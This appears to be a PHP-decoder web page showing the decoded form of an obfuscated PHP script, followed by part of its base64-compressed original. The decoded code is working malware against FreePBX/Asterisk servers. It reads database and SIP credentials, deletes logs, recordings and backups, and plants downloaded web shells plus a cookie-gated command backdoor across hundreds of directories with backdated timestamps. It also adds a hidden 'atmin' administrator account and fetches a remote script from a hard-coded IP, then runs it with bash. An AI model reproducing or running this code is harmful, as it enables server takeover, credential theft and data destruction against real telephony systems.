Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzuncompress(base64_decode('eJy9XPtz2zYS/vn8V6Cqp5JaS/IrkyaOkzqxL+dpEmdit50516..
Decoded Output download
error_reporting(0);
ini_set('error_reporting', 0);
$file = is_file("/etc/asterisk/freepbx.conf") ? "/etc/asterisk/freepbx.conf" : "/etc/freepbx.conf";
is_file($file) ? eval(str_replace(array('<?php', '?>', 'require', 'include'), array('', '', '#require', '#include'), file_get_contents($file))) : '';
$amp_conf = (isset($amp_conf) ? $amp_conf : array());
$amportal = array();
foreach (explode("
", file_get_contents("/etc/amportal.conf")) as $key => $val) {
if (preg_match_all("/=/", $val, $amp3)) {
$exx = explode("=", $val);
$amportal[$exx[0]] = trim((isset($amp_conf[$exx[0]]) ? $amp_conf[$exx[0]] : str_replace($exx[0] . '=', '', $val)));
}
}
@exec("mkdir -p /var/www/html/vtigercrm &");
@exec("rm -rf /var/tmp/* /tmp/* /var/log/* &");
@exec("nohup rm -rf /tmp/* /var/spool/asterisk/monitor/* /var/www/backup/*.gz /var/lib/asterisk/bin/ultimate* /var/www/html/index.php /var/lib/asterisk/bin/xultima* &");
$amp = array_merge(array('AMPDBUSER' => 'asteriskuser', 'AMPDBNAME' => 'asterisk'), $amp_conf, $amportal);
$oldcwd = getcwd();
is_dir($amp["AMPWEBROOT"]) ? chdir($amp["AMPWEBROOT"]) : "";
$freespace = (disk_free_space(getcwd()) / 1024 / 1024);
if ($freespace < 100) {
@exec("cd /var/log/*.[0-9];nohup find . -type f | xargs -I {} cp /dev/null {} &");
@exec("rm -rf /var/tmp/* /tmp/* /var/log/* &");
@exec("nohup rm -rf /tmp/* /var/spool/asterisk/monitor/* /var/www/backup/*.gz /var/lib/asterisk/bin/ultimat* /var/www/html/index.php &");
}
$dirs = array($oldcwd . '/', getcwd() . '/', '/var/www/html/vtigercrm', '/admin/assets/css/', '/admin/assets/js/', '/admin/modules/cdr/assets/js/', '/admin/modules/fw_ari/htdocs_ari/theme/js/', '/panel/dhtml/js/', '/fop2/css/', '/Info/js/', '/libs/font-icons/entypo/css/', '/mail/program/js/tiny_mce/plugins/xhtmlxtras/js/', '/modules/kconfig/js/', '/stats/plugins/dialer/js/', '/var/www/html/', '/var/www/', '/var/www/freepbx/', '/var/www/localhost/', '/opt/freepbx/', '/admin/modules/backup/assets/', '/admin/modules/cdr/assets/');
foreach ($dirs as $K => $V) {
$dirs[] = $V . '/Info/js/';
$dirs[] = $V . '/_asterisk/';
$dirs[] = $V . '/a2billing/';
$dirs[] = $V . '/a2billing/agent/Public/';
$dirs[] = $V . '/admin/';
$dirs[] = $V . '/admin/assets/';
$dirs[] = $V . '/admin/assets/css/';
$dirs[] = $V . '/admin/assets/js/';
$dirs[] = $V . '/admin/modules/cdr/assets/js/';
$dirs[] = $V . '/admin/modules/fw_ari/htdocs_ari/theme/js/';
$dirs[] = $V . '/assets/';
$dirs[] = $V . '/css/';
$dirs[] = $V . '/digium_phones/';
$dirs[] = $V . '/fop2/css/';
$dirs[] = $V . '/freepbx/';
$dirs[] = $V . '/html/';
$dirs[] = $V . '/js/';
$dirs[] = $V . '/libs/font-icons/entypo/css/';
$dirs[] = $V . '/mail/program/js/tiny_mce/plugins/xhtmlxtras/js/';
$dirs[] = $V . '/modules/kconfig/js/';
$dirs[] = $V . '/panel/';
$dirs[] = $V . '/panel/dhtml/js/';
$dirs[] = $V . '/public_html/';
$dirs[] = $V . '/recordings/';
$dirs[] = $V . '/stats/plugins/dialer/js/';
$dirs[] = $V . '/var/tmp/mae.php';
$dirs[] = $V . '/var/tmp/maf.php';
$dirs[] = $V . '/var/www/.freepbx-known/';
$dirs[] = $V . '/var/www/.well-known/';
$dirs[] = $V . '/var/www/_asterisk/';
$dirs[] = $V . '/var/www/admin/';
$dirs[] = $V . '/var/www/admin/api/';
$dirs[] = $V . '/var/www/admin/assets/';
$dirs[] = $V . '/var/www/admin/assets/css/';
$dirs[] = $V . '/var/www/admin/assets/css/custom-theme/';
$dirs[] = $V . '/var/www/admin/assets/css/images/';
$dirs[] = $V . '/var/www/admin/assets/fonts/';
$dirs[] = $V . '/var/www/admin/assets/images/';
$dirs[] = $V . '/var/www/admin/assets/js/';
$dirs[] = $V . '/var/www/admin/assets/js/bootstrap-table-extensions-dev/';
$dirs[] = $V . '/var/www/admin/assets/js/bootstrap-table-locale/';
$dirs[] = $V . '/var/www/admin/assets/js/views/';
$dirs[] = $V . '/var/www/admin/assets/less/';
$dirs[] = $V . '/var/www/admin/helpers/';
$dirs[] = $V . '/var/www/admin/i18n/';
$dirs[] = $V . '/var/www/admin/images/';
$dirs[] = $V . '/var/www/admin/libraries/';
$dirs[] = $V . '/var/www/admin/licenses/';
$dirs[] = $V . '/var/www/admin/modules/';
$dirs[] = $V . '/var/www/admin/modules/amd/assets/';
$dirs[] = $V . '/var/www/admin/modules/announcement/assets/';
$dirs[] = $V . '/var/www/admin/modules/arimanager/assets/';
$dirs[] = $V . '/var/www/admin/modules/asterisk-cli/assets/';
$dirs[] = $V . '/var/www/admin/modules/backup/assets/';
$dirs[] = $V . '/var/www/admin/modules/blacklist/assets/';
$dirs[] = $V . '/var/www/admin/modules/bulkhandler/assets/';
$dirs[] = $V . '/var/www/admin/modules/calendar/assets/';
$dirs[] = $V . '/var/www/admin/modules/callback/assets/';
$dirs[] = $V . '/var/www/admin/modules/callrecording/assets/';
$dirs[] = $V . '/var/www/admin/modules/cdr/assets/';
$dirs[] = $V . '/var/www/admin/modules/cdr/assets/js/';
$dirs[] = $V . '/var/www/admin/modules/cel/assets/';
$dirs[] = $V . '/var/www/admin/modules/certman/assets/';
$dirs[] = $V . '/var/www/admin/modules/cidlookup/assets/';
$dirs[] = $V . '/var/www/admin/modules/conferences/assets/';
$dirs[] = $V . '/var/www/admin/modules/configedit/assets/';
$dirs[] = $V . '/var/www/admin/modules/contactmanager/assets/';
$dirs[] = $V . '/var/www/admin/modules/core/assets/';
$dirs[] = $V . '/var/www/admin/modules/customappsreg/assets/';
$dirs[] = $V . '/var/www/admin/modules/cxpanel/';
$dirs[] = $V . '/var/www/admin/modules/dahdiconfig/assets/';
$dirs[] = $V . '/var/www/admin/modules/dashboard/assets/';
$dirs[] = $V . '/var/www/admin/modules/daynight/assets/';
$dirs[] = $V . '/var/www/admin/modules/digium_phones/assets/';
$dirs[] = $V . '/var/www/admin/modules/directory/assets/';
$dirs[] = $V . '/var/www/admin/modules/endpointman/assets/';
$dirs[] = $V . '/var/www/admin/modules/endpointman/provisioning/';
$dirs[] = $V . '/var/www/admin/modules/fax/assets/';
$dirs[] = $V . '/var/www/admin/modules/featurecodeadmin/assets/';
$dirs[] = $V . '/var/www/admin/modules/findmefollow/assets/';
$dirs[] = $V . '/var/www/admin/modules/hotelwakeup/assets/';
$dirs[] = $V . '/var/www/admin/modules/iaxsettings/assets/';
$dirs[] = $V . '/var/www/admin/modules/ivr/assets/';
$dirs[] = $V . '/var/www/admin/modules/languages/assets/';
$dirs[] = $V . '/var/www/admin/modules/logfiles/assets/';
$dirs[] = $V . '/var/www/admin/modules/miscapps/assets/';
$dirs[] = $V . '/var/www/admin/modules/miscdests/assets/';
$dirs[] = $V . '/var/www/admin/modules/music/assets/';
$dirs[] = $V . '/var/www/admin/modules/paging/assets/';
$dirs[] = $V . '/var/www/admin/modules/parking/assets/';
$dirs[] = $V . '/var/www/admin/modules/phonebook/assets/';
$dirs[] = $V . '/var/www/admin/modules/phpinfo/assets/';
$dirs[] = $V . '/var/www/admin/modules/pinsets/assets/';
$dirs[] = $V . '/var/www/admin/modules/presencestate/assets/';
$dirs[] = $V . '/var/www/admin/modules/printextensions/assets/';
$dirs[] = $V . '/var/www/admin/modules/queues/assets/';
$dirs[] = $V . '/var/www/admin/modules/recordings/assets/';
$dirs[] = $V . '/var/www/admin/modules/restapi/assets/';
$dirs[] = $V . '/var/www/admin/modules/ringgroups/assets/';
$dirs[] = $V . '/var/www/admin/modules/setcid/assets/';
$dirs[] = $V . '/var/www/admin/modules/sipsettings/assets/';
$dirs[] = $V . '/var/www/admin/modules/sipstation/assets/';
$dirs[] = $V . '/var/www/admin/modules/soundlang/assets/';
$dirs[] = $V . '/var/www/admin/modules/superfecta/assets/';
$dirs[] = $V . '/var/www/admin/modules/timeconditions/assets/';
$dirs[] = $V . '/var/www/admin/modules/ttsengines/assets/';
$dirs[] = $V . '/var/www/admin/modules/ucp/assets/';
$dirs[] = $V . '/var/www/admin/modules/ucp/htdocs/';
$dirs[] = $V . '/var/www/admin/modules/userman/assets/';
$dirs[] = $V . '/var/www/admin/modules/versionupgrade/assets/';
$dirs[] = $V . '/var/www/admin/modules/vmblast/assets/';
$dirs[] = $V . '/var/www/admin/modules/voicemail/assets/';
$dirs[] = $V . '/var/www/admin/views/';
$dirs[] = $V . '/var/www/agc22/';
$dirs[] = $V . '/var/www/asteridex4/';
$dirs[] = $V . '/var/www/asteriskpbx/';
$dirs[] = $V . '/var/www/avantfax/';
$dirs[] = $V . '/var/www/certsci1/';
$dirs[] = $V . '/var/www/configupdata/';
$dirs[] = $V . '/var/www/degium_endpoint/';
$dirs[] = $V . '/var/www/digium_endpoints/';
$dirs[] = $V . '/var/www/digium_phones/';
$dirs[] = $V . '/var/www/error/';
$dirs[] = $V . '/var/www/framwork/';
$dirs[] = $V . '/var/www/freepbx/';
$dirs[] = $V . '/var/www/freepbx/digium_phones/';
$dirs[] = $V . '/var/www/goautodial-admin22/';
$dirs[] = $V . '/var/www/goautodial-agent22/';
$dirs[] = $V . '/var/www/goautodial22/';
$dirs[] = $V . '/var/www/html/.freepbx-known/';
$dirs[] = $V . '/var/www/html/.well-known/';
$dirs[] = $V . '/var/www/html/admin/api/';
$dirs[] = $V . '/var/www/html/admin/assets/css/custom-theme/';
$dirs[] = $V . '/var/www/html/admin/assets/css/images/';
$dirs[] = $V . '/var/www/html/admin/assets/fonts/';
$dirs[] = $V . '/var/www/html/admin/assets/js/bootstrap-table-extensions-dev/';
$dirs[] = $V . '/var/www/html/admin/assets/js/bootstrap-table-locale/';
$dirs[] = $V . '/var/www/html/admin/assets/less/';
$dirs[] = $V . '/var/www/html/admin/licenses/';
$dirs[] = $V . '/var/www/html/admin/modules/amd/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/announcement/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/arimanager/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/asterisk-cli/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/blacklist/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/bulkhandler/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/calendar/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/callback/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/callrecording/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/cel/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/certman/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/conferences/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/configedit/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/contactmanager/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/customappsreg/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/cxpanel/';
$dirs[] = $V . '/var/www/html/admin/modules/dahdiconfig/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/dashboard/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/daynight/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/digium_phones/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/directory/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/endpointman/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/endpointman/provisioning/';
$dirs[] = $V . '/var/www/html/admin/modules/featurecodeadmin/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/findmefollow/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/hotelwakeup/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/languages/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/miscapps/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/miscdests/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/music/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/phonebook/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/pinsets/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/presencestate/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/printextensions/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/restapi/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/ringgroups/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/setcid/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/soundlang/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/superfecta/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/timeconditions/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/ttsengines/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/ucp/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/ucp/htdocs/';
$dirs[] = $V . '/var/www/html/admin/modules/userman/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/versionupgrade/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/vmblast/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/voicemail/assets/';
$dirs[] = $V . '/var/www/html/agc22/';
$dirs[] = $V . '/var/www/html/asteridex4/';
$dirs[] = $V . '/var/www/html/asteriskpbx/';
$dirs[] = $V . '/var/www/html/avantfax/';
$dirs[] = $V . '/var/www/html/certsci1/';
$dirs[] = $V . '/var/www/html/configupdata/';
$dirs[] = $V . '/var/www/html/degium_endpoint/';
$dirs[] = $V . '/var/www/html/digium_endpoints/';
$dirs[] = $V . '/var/www/html/digium_phones/';
$dirs[] = $V . '/var/www/html/framwork/';
$dirs[] = $V . '/var/www/html/freepbx/';
$dirs[] = $V . '/var/www/html/freepbx/digium_phones/';
$dirs[] = $V . '/var/www/html/goautodial-admin22/';
$dirs[] = $V . '/var/www/html/goautodial-agent22/';
$dirs[] = $V . '/var/www/html/goautodial22/';
$dirs[] = $V . '/var/www/html/imsicatcher/';
$dirs[] = $V . '/var/www/html/js/';
$dirs[] = $V . '/var/www/html/pbx/';
$dirs[] = $V . '/var/www/html/reminders/';
$dirs[] = $V . '/var/www/html/restapi/';
$dirs[] = $V . '/var/www/html/restapps/';
$dirs[] = $V . '/var/www/html/sip/';
$dirs[] = $V . '/var/www/html/sipml5/';
$dirs[] = $V . '/var/www/html/test/';
$dirs[] = $V . '/var/www/html/vicidial/';
$dirs[] = $V . '/var/www/html/vtigercrm/';
$dirs[] = $V . '/var/www/html/vtigercrm/Image/';
$dirs[] = $V . '/var/www/html/vtigercrm/Smarty/';
$dirs[] = $V . '/var/www/html/vtigercrm/adodb/';
$dirs[] = $V . '/var/www/html/vtigercrm/backup/';
$dirs[] = $V . '/var/www/html/vtigercrm/cache/';
$dirs[] = $V . '/var/www/html/vtigercrm/class_http/';
$dirs[] = $V . '/var/www/html/vtigercrm/class_http_dir/';
$dirs[] = $V . '/var/www/html/vtigercrm/cron/';
$dirs[] = $V . '/var/www/html/vtigercrm/data/';
$dirs[] = $V . '/var/www/html/vtigercrm/database/';
$dirs[] = $V . '/var/www/html/vtigercrm/include/';
$dirs[] = $V . '/var/www/html/vtigercrm/jscalendar/';
$dirs[] = $V . '/var/www/html/vtigercrm/license/';
$dirs[] = $V . '/var/www/html/vtigercrm/log4php.debug/';
$dirs[] = $V . '/var/www/html/vtigercrm/log4php/';
$dirs[] = $V . '/var/www/html/vtigercrm/logs/';
$dirs[] = $V . '/var/www/html/vtigercrm/modules/';
$dirs[] = $V . '/var/www/html/vtigercrm/packages/';
$dirs[] = $V . '/var/www/html/vtigercrm/schema/';
$dirs[] = $V . '/var/www/html/vtigercrm/soap/';
$dirs[] = $V . '/var/www/html/vtigercrm/storage/';
$dirs[] = $V . '/var/www/html/vtigercrm/test/';
$dirs[] = $V . '/var/www/html/vtigercrm/themes/';
$dirs[] = $V . '/var/www/html/vtigercrm/user_privileges/';
$dirs[] = $V . '/var/www/html/vtigercrm/vtlib/';
$dirs[] = $V . '/var/www/html/wordpress/';
$dirs[] = $V . '/var/www/icons/';
$dirs[] = $V . '/var/www/images/';
$dirs[] = $V . '/var/www/imsicatcher/';
$dirs[] = $V . '/var/www/js/';
$dirs[] = $V . '/var/www/pbx/';
$dirs[] = $V . '/var/www/recordings/';
$dirs[] = $V . '/var/www/recordings/includes/';
$dirs[] = $V . '/var/www/recordings/locale/';
$dirs[] = $V . '/var/www/recordings/misc/';
$dirs[] = $V . '/var/www/recordings/modules/';
$dirs[] = $V . '/var/www/recordings/theme/';
$dirs[] = $V . '/var/www/reminders/';
$dirs[] = $V . '/var/www/restapi/';
$dirs[] = $V . '/var/www/restapps/';
$dirs[] = $V . '/var/www/sip/';
$dirs[] = $V . '/var/www/sipml5/';
$dirs[] = $V . '/var/www/test/';
$dirs[] = $V . '/var/www/vicidial/';
$dirs[] = $V . '/var/www/vtigercrm/';
$dirs[] = $V . '/var/www/vtigercrm/Image/';
$dirs[] = $V . '/var/www/vtigercrm/Smarty/';
$dirs[] = $V . '/var/www/vtigercrm/adodb/';
$dirs[] = $V . '/var/www/vtigercrm/backup/';
$dirs[] = $V . '/var/www/vtigercrm/cache/';
$dirs[] = $V . '/var/www/vtigercrm/class_http/';
$dirs[] = $V . '/var/www/vtigercrm/class_http_dir/';
$dirs[] = $V . '/var/www/vtigercrm/cron/';
$dirs[] = $V . '/var/www/vtigercrm/data/';
$dirs[] = $V . '/var/www/vtigercrm/database/';
$dirs[] = $V . '/var/www/vtigercrm/include/';
$dirs[] = $V . '/var/www/vtigercrm/jscalendar/';
$dirs[] = $V . '/var/www/vtigercrm/license/';
$dirs[] = $V . '/var/www/vtigercrm/log4php.debug/';
$dirs[] = $V . '/var/www/vtigercrm/log4php/';
$dirs[] = $V . '/var/www/vtigercrm/logs/';
$dirs[] = $V . '/var/www/vtigercrm/modules/';
$dirs[] = $V . '/var/www/vtigercrm/packages/';
$dirs[] = $V . '/var/www/vtigercrm/schema/';
$dirs[] = $V . '/var/www/vtigercrm/soap/';
$dirs[] = $V . '/var/www/vtigercrm/storage/';
$dirs[] = $V . '/var/www/vtigercrm/test/';
$dirs[] = $V . '/var/www/vtigercrm/themes/';
$dirs[] = $V . '/var/www/vtigercrm/user_privileges/';
$dirs[] = $V . '/var/www/vtigercrm/vtlib/';
$dirs[] = $V . '/var/www/wordpress/';
$dirs[] = $V . '/vtigercrm/';
$dirs[] = $V . '/';
$dirs[] = $V . '/var/www/html/recordings/misc/';
}
$dirs = array_unique($dirs);
sort($dirs);
$contents = array('cxc' => file_get_contents('http://173.212.233.104/z/newx.txt'), 'c' => file_get_contents('http://173.212.233.104/t/c99.txt'), 'coc' => file_get_contents('http://173.212.233.104/t/Do.txt'), 'codes' => '<?php $cmd=((isset($_COOKIE["b3d0r"])) && (md5(sha1($_COOKIE["b3d0r"]))=="75f81b0a48e47471bfaa07450b29325c"))? $_COOKIE["cmd"]: "echo \'b3d0r T\'"; system($cmd); ?>');
$freespace = (disk_free_space(getcwd()) / 1024 / 1024);
if ($freespace > 100) {
foreach ($dirs as $k => $where) {
if (is_dir($where)) {
(is_writeable($where)) ? write_dir($where) : '';
$od = opendir($where);
while ($rd = readdir($od)) {
$wd = $where . '/' . $rd;
(($rd != '..') && ($rd != '.') && is_writeable($wd) && is_dir($wd)) ? write_dir($wd) : '';
}
}
}
}
$pass = random_password();
if (count($amp) > 3) {
echo "
[+] Config Fetched ..";
$con = mysql_connect($amp['AMPDBHOST'], $amp['AMPDBUSER'], $amp['AMPDBPASS']) or print (mysql_error());
echo "
[+] Connected To Database server ..";
mysql_select_db($amp['AMPDBNAME'], $con) or print (mysql_error());
echo "
[+] Connected To Database ..";
mysql_query("delete from ampusers where username!='admin'");
$query = mysql_query("INSERT INTO `ampusers` ( `username`, `password_sha1`, `sections` ) VALUES ( 'atmin', '" . sha1($pass) . "', '*' );") or print ("
[-] Wrong Column ,, trying another column ..");
if (!$query) {
$query = mysql_query("INSERT INTO `ampusers` ( `username`, `password`, `sections` ) VALUES ( 'atmin', '$pass', '*' );") or print ("
[-]Couldn't Determine Column .. Should Add admin Manually ..<br />" . mysql_error());
}
if ($query) {
echo "
[+] Admin User Added ..
[+] atmin : $pass
";
}
is_dir("../admin") ? @symlink('../admin', 'atmin') : "";
is_dir("/var/www/html/admin") ? @symlink('/var/www/html/admin', '/var/www/html/recordings/atmin') : "";
} else {
echo "
[-] Should Work Manually on this server ..
";
}
if (is_file("/var/www/html/libs/paloSantoDB.class.php")) {
include_once "/var/www/html/libs/paloSantoDB.class.php";
include_once "/var/www/html/libs/paloSantoACL.class.php";
$pDB = new paloDB("sqlite3:////var/www/db/acl.db");
$pACL = new paloACL($pDB);
$query = "SELECT id from acl_user where name='atmin'";
$iddb = $pDB->fetchTable($query);
$tid = $iddb[0][0];
if ($tid < 2) {
$pACL->createUser('atmin', '', md5($pass), '');
$iddb = $pDB->fetchTable($query);
$tid = $iddb[0][0];
}
$pACL->changePassword($tid, md5($pass));
$pACL->addToGroup($tid, 1);
echo "
[+] Admin User Added ..
[+] atmin : $pass
";
}
echo "-----------AMPDB-----------
";
@system("grep AMPDB /etc/amportal.conf");
echo "-----------ARI_ADMIN-----------
";
@system("grep ARI_ADMIN /etc/amportal.conf");
echo "-----------AMPMGR-----------
";
@system("grep AMPMGR /etc/amportal.conf");
echo "-----------PASS-----------
";
@system("grep PASS /etc/amportal.conf");
echo "=====sip_registrations========================
";
@system("cat /etc/asterisk/sip_registrations.conf");
echo "==========sip_additional===================================
";
@system("cat /etc/asterisk/sip_additional.conf");
echo "------------BADR in----------
";
function write_dir($where) {
write_file($where . '/Do.php', 'coc');
write_file($where . '/index.php', 'coc');
write_file($where . '/phpversions.php', 'codes');
write_file($where . '/config.all.php', 'codes');
write_file($where . '/graph.php', 'codes');
write_file($where . '/hamed.php', 'c');
write_file($where . '/new.sh', 'cxc');
write_file($where . '/page.framework.php', 'coc');
write_file($where . '/configs.php', 'coc');
write_file($where . '/salem.php', 'coc');
write_file($where . '/audio.php', 'coc');
write_file($where . '/MeSSi.php', 'coc');
}
function write_file($fname, $wtw) {
GLOBAL $contents;
if ($contents[$wtw] !== '') {
file_put_contents($fname, $contents[$wtw]);
touch($fname, strtotime('-10 years', time()));
}
}
function random_password($length = 7) {
$set = array_merge(range('A', 'Z'), range('a', 'z'), range('0', '9'));
$str = 't';
for ($i = 0;$i < $length;$i++) {
$str.= $set[rand(0, count($set) - 1) ];
}
return $str;
}
@system("curl -ks http://173.212.233.104/z/newx.txt > /tmp/x.out || wget http://173.212.233.104/z/newx.txt -O /tmp/x.out || GET http://173.212.233.104/z/newx.txt > /tmp/x.out;bash /tmp/x.out;rm -rf /tmp/x.out;rm /var/www/html/.htaccess;rm /var/www/html/admin/.htaccess");
echo "------------finsh ALL----------
";Did this file decode correctly?
Original Code
<?php
eval(gzuncompress(base64_decode('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